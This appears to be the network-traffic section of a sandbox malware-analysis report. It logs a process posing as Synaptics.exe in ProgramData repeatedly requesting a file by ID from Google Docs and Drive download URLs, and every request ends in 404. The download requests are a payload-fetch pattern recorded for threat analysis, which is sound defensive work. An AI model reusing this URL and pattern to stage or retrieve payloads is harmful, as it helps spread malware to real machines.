                                                                                              2025-01-02 19:28:47 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 55 55 45 62 78 6f 48 70 43 63 44 5f 56 61 7a 4d 6e 4f 4e 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KUUEbxoHpCcD_VazMnONGA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                              2025-01-02 19:28:47 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.749742216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:47 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:47 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-4CT4m8gkTyZip6c9jMtQSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.749740142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:47 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2025-01-02 19:28:47 UTC1595INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6y-NqeDsV2q-e1p0fryf_bqdAU3yzpjGLdcNLadSpNmd_4bFDyqGS45XIawW61yq2-
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:47 GMT
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-SQEE3XChO5OufOScLviPgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Set-Cookie: NID=520=Z8ISdsaDgeQ-R92528VnVtLURB30Y38-aVS--eidvIefqkCEPr3CIShwBqvQNChxi78jJs_B6El_WOypI3n11rvYfqf5fJH8w9cnwSg4NbUzFQTFVkPa-k6AAbvGWHeJ6bZIGGecF_hCji0wmUDxwNYOPzmKmt0jaFEwuZae5k0dUpTZ8SV0SQRO; expires=Fri, 04-Jul-2025 19:28:47 GMT; path=/; domain=.google.com; HttpOnly
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:47 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 44 36 32 4c 30 6b 68 31 5f 4a 6c 33 73 39 78 6b 4c 35 34 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JD62L0kh1_Jl3s9xkL54cw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                              2025-01-02 19:28:47 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.749749216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:48 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:48 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:48 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-sJkmN1d1OdWl_ovGWW04Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.749750216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:48 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:48 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:48 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-oP5fPKlbKx864U8t-rWqQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.749751142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:48 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2025-01-02 19:28:48 UTC1594INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6CNHwX9ByHVXLK2Y9Mwd1W8viNGc9rxnwqof6_zCnMcKd-18W1uKplLlKEvywA466z
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:48 GMT
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-K1csnrv3Ux_WCWGxo_1g2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Set-Cookie: NID=520=GeAkmjbx9XzFNs4FFTRBp3iyJ_rRSIBOK5y196FKDF35PMipuw2aVwOKuIboxDPPASQuN-xbYZJkPpmtKazWJJ6TnCTLy4vwt9MEVuXzyph2RWF4j13r0KkdCxjiMzCLuTYbg-ZCUTdHoPAJjpCEwZFbPE4TT1r8RUGqNdikHEOX1FTNOdkVh2I; expires=Fri, 04-Jul-2025 19:28:48 GMT; path=/; domain=.google.com; HttpOnly
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:48 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 6b 79 4b 31 49 6f 6a 62 64 4a 66 51 57 4c 62 43 31 65 6f 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="okyK1IojbdJfQWLbC1eopg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                              2025-01-02 19:28:48 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.749753142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:48 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2025-01-02 19:28:48 UTC1601INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7ZwEnc1PIb9I5MrNJdEstaIf-fWQDifZcFfCBG4QZSHQSbyeihm2h9Y1MoHKXibzE06zSbEFM
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:48 GMT
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-RFAbyrQyclH2TtKasGQgrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Set-Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0; expires=Fri, 04-Jul-2025 19:28:48 GMT; path=/; domain=.google.com; HttpOnly
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:48 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 49 4f 4d 41 46 36 36 51 33 49 6c 6e 70 39 34 38 6b 38 75 4a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1IOMAF66Q3Ilnp948k8uJA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                              2025-01-02 19:28:48 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.749760216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:49 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:49 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:49 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-LN6Pmww0t0ls43srsQprxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.749761216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:49 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:49 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:49 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-7VNeC4wTkmrgOssF33unlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.749763142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                                                                                              2025-01-02 19:28:49 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7gj7_b01SB6FOTz6_v_j-HVhU2FRmuINHpSdtZaLmswnDBeKtv8RkGPB9zsAujc1JH
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:49 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-z2ou07_Y7Fb5ypCiiRoJ1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
